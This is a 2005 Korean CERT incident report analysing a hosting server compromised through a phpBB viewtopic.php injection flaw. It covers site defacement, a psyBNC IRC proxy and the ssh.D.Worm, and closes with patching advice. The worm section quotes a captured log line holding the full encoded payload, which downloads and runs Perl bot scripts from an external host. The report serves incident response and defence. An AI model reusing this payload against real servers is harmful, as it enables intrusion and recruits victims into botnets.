phpBB 취약점을 이용한 홈페이지 변조 및 웜 감염시스템 사고분석

KrCERT-AR-2005-09 http://www.krcert.org
phpBB 취약점을 이용한 웜 감염 시스템 사고분석 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
phpBB 취약점을 이용한 홈페이지 변조 및
웜 감염 시스템 사고분석
2005. 4. 28
인터넷침해사고대응지원센터 (KISC)
※ 본 보고서의 전부나 일부를 인용시 반드시 [자료: 한국정보보호진흥원(KISA)]룰 명시하여
주시기 바랍니다.
KrCERT-AR-2005-09 http://www.krcert.org
phpBB 취약점을 이용한 웜 감염 시스템 사고분석 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
1. 개 요
‘04년 말부터 꾸준히 발생하고 있는 홈페이지 변조사고들은 대부분 PHP
Injection을 이용한 웹 어플리케이션 취약점으로 인해 발생되고 있다.
‘05년 가장 많은 피해 원인은 제로보드의 취약점으로 현재는 감소하는 추세를
보이고 있으나, 4월에 들어서는 phpBB 취약점을 이용한 홈페이지 변조가 발견되
고 있다.
본 문서에서는 phpBB 취약점을 이용한 홈페이지 변조사고와 함께 피해 시스템
에서 발견된 웜을 분석하도록 한다.
2. 피해시스템 개요
1) R사의 웹호스팅 서버 (136개 도메인 웹 서비스 중)
o 운영체제 : Rehat Linux 7.3 (Kernel:2.4.18-3smp)
­Apache
: 1.3.33
­PHP
: 4.3.10
­FTP
: proftpd-1.2.9-1kr
­SSH
: Openssh-3.1p1-3
o 사용중인 웹 게시판
­
Zeroboard : 4.1.p14
­
테크노트 : technote-top
­
phpBB : 2.0.11
o 시스템용도 : Web, Mail, DNS, FTP, SSH My-SQL
3. 피해 현황
R社의 피해 시스템은 무료계정 발급을 통해 홈페이지 서비스를 제공하는 서버로서 분
석 당시 총 136개의 도메인이 운영중인 상태였다.
무료 홈페이지 서버인 관계로, 게시판 등의 설치에 제한을 두거나 별도의 관리
를 하지 않고 있어 취약한 버전의 공개용 웹 게시판들이 많이 사용 중인 상태였
다.
KrCERT-AR-2005-09 http://www.krcert.org
phpBB 취약점을 이용한 웜 감염 시스템 사고분석 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
□ 홈페이지 변조 해커그룹
홈페이지를 변조한 해커그룹은 “hax0rs lab”이란 브라질 해커 그룹으로, ‘04년
398개 도메인, ‘05년 4월 21일 현재 293개 도메인을 변조시킨 것으로 확인되고 있
다.
<그림 1> hax0rs lab 해커그룹 홈페이지 변조화면들
최소한 2명이상의 맴버로 구성된 것으로 알려진 이 해커그룹은 현재에도 꾸준
히 활동하고 있는 그룹으로 최근 홈페이지 변조에는 phpBB 취약점을 주로 이용
하는 것으로 확인되고 있다.
대부분의 홈페이지 변조관련 해커그룹과 마찬가지로 변조화면에는 그룹명과 이
메일 등과 함께 반미 메시지를 기재하는 경향을 보이고 있는데, 특히, ‘03년에는 4
개 이상의 서버 해킹을 통해 5000여개 이상의 홈페이지를 변조하였으며, 변조페이
지에 미국과 이라크의 전쟁에 대해 강한 반미, 반전 메시지를 게시하였다.
4. 피해 분석
□ 로그 분석
o 웹 로그
피해서버에서는 다수의 공개용 게시판이 사용되고 있었지만, 웹 로그에서는 홈
페이지 변조와 관련된 공격로그는 확인되지 않았다. 또한 피해시스템에 설치된 공
격툴 등의 악성 프로그램도 확인할 수 없었는데, 최근 발생한 홈페이지 변조사고
KrCERT-AR-2005-09 http://www.krcert.org
phpBB 취약점을 이용한 웜 감염 시스템 사고분석 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
의 대부분이 금번 사고와 같이 로그 및 악성프로그램을 모두 지우는 경향을 보이
고 있다.
o 시스템 로그
웹 로그와 마찬가지로 변조일자로 예상되는 4월 11일 전후의 로그에서는 특이
한 내용을 발견할 수 없었다.
o 기타
분석 작업을 위해 시스템에 접속하여 피해 시스템에 접속한 사용자를 확인해
보니 국외로 보이는 IP에서 접속되어 있는 것을 볼 수 있었는데, Whois로 확인해
본 결과, 브라질 IP 대역에서 접속한 것을 확인할 수 있었다.
bash-2.05a$ w
11:56am up 3 days, 40 min, 3 users, load average: 0.16, 0.25, 0.39
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ksc pts/0 211.252.xxx.xxx 11:37am 0.00s 0.06s 0.01s w
root pts/1 200-168-xxx-xxx.d 11:51am 1:13 0.06s 0.06s -bash
istyles pts/2 211.116.xxx.xxx 11:51am 1.00s 0.08s 0.04s bash
inetnum: 200.128/9
status: allocated
owner: Comite Gestor da Internet no Brasil
ownerid: BR-CGIN-LACNIC
responsible: Frederico A C Neves
address: Av. das Naes Unidas, 11541, 7 andar
address: 04578-000 - S. Paulo - SP
country: BR
□ 홈페이지 변조
확인결과, 운영중인 136개의 도메인 중 하나의 도메인에서 취약한 버전의
phpBB(2.0.10)을 사용하고 있는 것이 확인되었지만, 실제 phpBB 취약점을 이용해
홈페이지 변조작업을 한 로그는 확인되지 않았다.
설치된 악성프로그램으로는 psybnc가 확인되었는데, psybnc 프로그램은 IRC의
채널을 유지하거나 IRC proxy의 용도로 해커들이 자주 설치하는 프로그램으로,
이 프로그램을 이용해 해커는 자신이 원하는 이름의 IRC 채널을 유지하거나, IRC
KrCERT-AR-2005-09 http://www.krcert.org
phpBB 취약점을 이용한 웜 감염 시스템 사고분석 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
에 접속하는 자신의 IP를 감출 수 있게 된다.
[root@d23 psybnc]# ls -alct
합계 664
drwxr-xr-x 8 root root 4096 4월 11 12:14 .
-rw------- 1 root root 546 4월 11 12:14 psybnc.conf
-rw------- 1 root root 479 4월 11 12:14 psybnc.conf.old
drwxrwxr-x 2 root root 4096 4월 11 12:13 log
-rw------- 1 root root 7 4월 11 12:12 psybnc.pid
-rwxrwxr-x 1 root root 533616 4월 11 12:08 dothome.jpg
drwxr-xr-x 3 root root 4096 4월 11 12:08 ..
-rw-r--r-- 1 root root 18124 4월 11 12:08 CHANGES
-rw------- 1 root root 17982 4월 11 12:08 COPYING
-rw-r--r-- 1 root root 2660 4월 11 12:08 FAQ
-rw-r--r-- 1 root root 394 4월 11 12:08 Makefile
-rw-r--r-- 1 root root 36075 4월 11 12:08 README
-rw-r--r-- 1 root root 76 4월 11 12:08 TODO
drwxr-xr-x 2 root root 4096 4월 11 12:08 help
drwxrwxr-x 3 root root 4096 4월 11 12:08 menuconf
drwxrwxr-x 2 root root 4096 4월 11 12:08 motd
-rwxrwxr-x 1 root root 369 4월 11 12:08 psybncchk
drwxrwxr-x 3 root root 4096 4월 11 12:08 scripts
drwxrwxr-x 2 root root 4096 4월 11 12:08 tools
□ 웜 분석
홈페이지 변조와 관련된 웹 로그나 변조를 위해 설치된 악성프로그램들은 확인
할 수 없었으나 웹 로그의 일부 내용을 통해 phpBB 취약점을 통해 전파되는
ssh.D.Worm에 감염된 것을 확인할 수 있었다.
다음은 웜 감염 시 남게 되는 웹 로그이다.
213.114.xxx.xxx - - [05/Apr/2005:13:13:14 +0900] "GET
/zog/?no=80&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%
20/tmp;mkdir%20.temp;cd%20.temp;wget%20http://61.85.xxx.xxx/.zk/msn.txt;wget%20ht
tp://61.85.xxx.xxx/.zk/coll.txt;wget%20http://61.85.xxx.xxx/.zk/g.txt;perl%20msn.txt;rm%2
0msn.txt;perl%20coll.txt;rm%20coll.txt;perl%20g.txt;rm%20g.txt%3B%20%65%63%68%
6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%2
8%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68
%5D%29.%2527'; HTTP/1.1" 200 69477 "-" "LWP::Simple/5.79"
ssh.D.Worm은 올해 1월초 국외에서 발견된 웜으로, 작년 말 발견된 santy웜과
동일한 phpBB 취약점을 이용해 전파되는 웜으로 phpBB 2.0.10이하 버전에 존재
KrCERT-AR-2005-09 http://www.krcert.org
phpBB 취약점을 이용한 웜 감염 시스템 사고분석 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
하는 취약점을 이용해 전파되게 된다.
phpBB는 게시판이나 포럼 등을 홈페이지에서 운영하고자 할 때 사용할 수 있
는 공개용 웹 게시판 프로그램 중 하나로서, 게시판 구성파일중 viewtopic.php 파
일이 hightlight 파라미터의 값 처리의 오류로 인해 외부에서 웹 서버 내부의 시
스템 명령을 실행할 수 있는 취약점이 존재하고 있다.
해당 웜은 이러한 phpBB의 취약점을 이용해 전파되며, 웜 감염 시 외부의 특정
IRC 채널에 접속되어 외부 시스템으로의 서비스 거부공격등에 이용되게 된다.
<표> ssh.D.Worm 웜 구성파일
프로그램명 md5sum 용량 용도
msn.txt 990786079bb2fa16bcec3a8a33ba1fc7 2,121 byte -
coll.txt e1056914c7fd53c17157492419c5b8ce 21,122 byte Bot 연결
g.txt f6d803414e6997f7066a5a4141f4bb2d 2,066 byte -
o 세부분석
최초 웜 감염 시 설치되는 악성 프로그램은 모두 3개로, 모두 perl로 제작되었
으며, 웜의 세부 분석 및 동작확인을 위해 리눅스 시스템에 웜 파일을 감염시켜
분석을 실시하였다.
① 최초, phpBB의 취약점을 이용해 감염시스템 내 /tmp 디렉토리에 “.temp”
디렉토리를 생성한다.
② 3개의 악성 프로그램을 다운로드 한다. (msn.txt, coll.txt, g.txt)
③ 3개의 악성 프로그램을 다운로드 된 순서대로 실행된다. (예:perl msn.txt,
rm msn.txt)
악성프로그램들은 실행 후 삭제하며, 실제 실행되는 프로세스명은 원래 악성
프로그램의 파일명 대신 아래와 같은 이름으로 실행되도록 프로그램에 코딩
되어 있다.
KrCERT-AR-2005-09 http://www.krcert.org
phpBB 취약점을 이용한 웜 감염 시스템 사고분석 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
o 악성프로그램의 실행 프로세스 명
- msn.txt : httpd -D55L
- coll.txt : httpd -DSSL
- g.txt : httpd -DSSL
<msn.txt 소스 일부>
- msn.txt와 g.txt은 웜의 전파를 위한 파일들로서 각각 msn.com.br과
google.com, yahoo.com 사이트를 통해 phpBB를 사용하고 있는 사이트를
검색하여 공격에 이용하며, 이는 Santy웜이 감염을 위해 여러 검색사이트
를 이용하는 것과 유사하다.
- coll.txt 파일은 실행 시 외부의 IRC 서버의 특정 채널로 피해시스템이 접
속을 시도하게 되며, 접속이 된 후 피해 시스템은 해당 IRC 채널을 통해
서비스 거부 공격 등의 Bot 클라이언트로 이용되게 된다.
- 피해시스템이 접속을 시도하는 국외의 서버는 Bot C&C 서버로 예상되며,
스캔을 통해 해당 국외 시스템을 확인해 본 결과, IRC 서비스가 TCP 6667
번 포트와 6668번 포트에서 동작중인 것을 확인할 수 있었다.
KrCERT-AR-2005-09 http://www.krcert.org
phpBB 취약점을 이용한 웜 감염 시스템 사고분석 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
<그림> coll.txt 소스일부
- 또한, 해당 서버에는 IRC 서비스 외에도 TCP 1111번 포트에 SSH 서비스가
동작중인 것으로 보아, 국외서버 또한 해킹을 당한 것으로 예상되어 해당
IP의 관리업체로 통보하였다.
<그림> 국외 시스템 스캔결과
KrCERT-AR-2005-09 http://www.krcert.org
phpBB 취약점을 이용한 웜 감염 시스템 사고분석 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
<그림> 국외 IRC 서버로의 접속시도
- IRC에 접속된 감염 시스템은 일반 Bot 클라이언트와 유사하게 IRC 채널 상에
서 전달되는 명령에 따라 외부의 특정 시스템에 대한 포트스캔과 서비스 거부
공격 등의 동작을 하게 된다.
KrCERT-AR-2005-09 http://www.krcert.org
phpBB 취약점을 이용한 웜 감염 시스템 사고분석 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
5. 결론
시스템의 특정 취약점을 이용해 홈페이지를 변조하는 사고들은 금번 공개용 웹
게시판들의 취약점 이전에도 꾸준히 발생되어 왔으며, 이러한 홈페이지 변조사고
의 대부분은 이미 알려진 취약점의 미 패치로 인해 발생하는 것이 대부분이다.
본 사고 역시 약 6개월 정도의 기간동안 공지되어왔던 phpBB 취약점으로 인해 홈
페이지가 변조되었고, 악성 Bot 클라이언트로 악용된 경우로, 웹 게시판의 패치가 되
어 있었다면 이러한 피해는 발생하지 않았을 것이다.
또 하나, 실제 홈페이지 변조같이 쉽게 파악할 수 있는 사고보다는 피해 시스템
을 외부로는 드러나지 않는 다른 용도로 악용하는 사례들이 홈페이지 변조사고
보다 더 많이 발생하고 있다는 것이다. 이러한 사고들은 시스템 패치와 더불어
평소 시스템의 상태를 주기적으로 체크하거나, 관리하고 있는 네트웍 트래픽을 모
니터링 하는 기본적인 관리만으로도 많은 피해를 예방할 수 있을 것이다.
- 홈페이지 변조피해를 막기 위해서는 필히 현재 설치되어 있는 웹 게시판의
사용현황을 파악하여야 하고, 해당 웹 게시판에 맞는 보안패치를 적용해야
한다.
. phpBB 보안패치 다운로드 사이트
(http://www.phpbb.com/download.php)
- PHP로 제작된 게시판을 사용하는 경우 php.ini의 설정을 변경하는 작업이
필요하다.
. allow_url_fopen의 설정을 Off로 변경한다.
- 악성 Bot 클라이언트로의 도용을 막기 위해서는 IRC에서 사용되는 포트를
내부 네트웍에서 외부 네트웍으로의 Outbound 트래픽에 대해 차단하는 것
도 피해를 줄일 수 있는 방법 중 하나이다.
. IRC 서비스 포트 : TCP 6666, 6667, 6668, 6669